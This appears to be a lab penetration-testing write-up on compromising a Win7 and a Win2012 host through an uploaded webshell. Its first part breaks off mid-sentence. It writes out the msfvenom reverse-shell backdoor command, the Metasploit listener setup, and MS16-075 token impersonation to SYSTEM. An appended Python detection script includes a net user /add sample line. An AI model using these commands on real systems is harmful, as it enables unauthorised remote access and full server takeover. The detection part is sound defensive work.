Part One: Win7
1. A webshell was uploaded to the server and accessed.
2. Because permissions on the Win7 host had not been configured, any command could be executed.
Privilege escalation succeeded directly. You could also escalate using an exploit provided by the msf tools, but it is too late today to do the
Part Two: Win2012
1. Uploaded a large webshell to the web server.
2. Accessed the webshell from the test machine and ran whoami; it executed successfully, and the account was the IIS service account.
3. Ran systeminfo to obtain the server's system and patch information.
4. Tried net user, which could list users; net user /add did not succeed.
6. Used a test script in the upload directory to check which directories were readable and writable, and found a readable and writable directory.
7. Generated a backdoor with msfvenom and set up a listener on the port.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.158 lport=1234 -f exe -o ./hack.exe
This generates the backdoor; upload it to the server.
Start the listener:
1) use exploit/multi/handler
2) set PAYLOAD windows/meterpreter/reverse_tcp
3) set LHOST 192.168.190.158
4) set LPORT 1234
5) exploit
Then run the hack.exe program on the target server to proceed with privilege escalation.
8. The session was received successfully.
9. Used MS16-075 to escalate privileges, then ran the following commands:
use incognito
list_tokens -u
execute -cH -f ./potato.exe
10. Privilege escalation
After running the MS16-075 escalation program, run the following commands again to raise the current user's permissions to NT AUTHORITY\SYSTEM:
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
getuid
Privilege escalation succeeded.
Done.
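As an added detection-side example (not part of the original write-up), the following Python script flags the Part Two chain as it would appear in process-creation telemetry: the IIS worker process (w3wp.exe, an assumption about the web server) spawning whoami, systeminfo and net user, the net user /add attempt, and an executable launched from a writable upload directory. The record format, upload path and account names are constructed.

```python
"""Flag webshell-style activity spawned by the IIS worker process (w3wp.exe).

Added example, not from the original write-up: scans constructed process-creation
records (Sysmon Event ID 1 style fields) for the chain described above. The record
format, upload path and account names are assumptions.
"""
import re

RECON = {"whoami", "systeminfo", "net", "net1"}       # commands run in the write-up
UPLOAD_DIRS = ("c:\\inetpub\\wwwroot\\upload\\",)    # assumed writable upload directory
NET_ADD = re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b", re.I)

def parse(line):
    """Parse a 'Key=value|Key=value' record (constructed log format) into a dict."""
    return dict(part.split("=", 1) for part in line.split("|"))

def classify(ev):
    """Return alert reasons for one record; an empty list means no finding."""
    if ev["ParentImage"].lower().rsplit("\\", 1)[-1] != "w3wp.exe":
        return []                                    # only children of the web server
    reasons = []
    hits = sorted(RECON & {t.lower() for t in ev["CommandLine"].split()})
    if hits:
        reasons.append("recon from web process: " + ", ".join(hits))
    if NET_ADD.search(ev["CommandLine"]):
        reasons.append("local account creation attempted by " + ev["User"])
    if ev["Image"].lower().startswith(UPLOAD_DIRS):
        reasons.append("executable launched from writable upload directory")
    return reasons

def scan(lines):
    """Return (CommandLine, reasons) for each record that raised an alert."""
    return [(ev["CommandLine"], r) for ev in map(parse, lines) if (r := classify(ev))]

# Constructed sample records: four suspicious, two benign (ASP.NET compiler, desktop shell).
W3WP = "ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe|"
POOL = "|User=IIS APPPOOL\\DefaultAppPool|CommandLine="
SAMPLE = [
    W3WP + "Image=C:\\Windows\\System32\\cmd.exe" + POOL + "cmd.exe /c whoami",
    W3WP + "Image=C:\\Windows\\System32\\cmd.exe" + POOL + "cmd.exe /c systeminfo",
    W3WP + "Image=C:\\Windows\\System32\\cmd.exe" + POOL + "cmd.exe /c net user test Passw0rd /add",
    W3WP + "Image=C:\\inetpub\\wwwroot\\upload\\hack.exe" + POOL + "hack.exe",
    W3WP + "Image=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe" + POOL + "csc.exe /noconfig",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\cmd.exe|User=CORP\\alice|CommandLine=cmd.exe",
]

if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE):
        print(cmdline, "->", "; ".join(reasons))
```

Feeding real Sysmon or EDR process-creation events through parse() only requires mapping their field names onto ParentImage, Image, User and CommandLine.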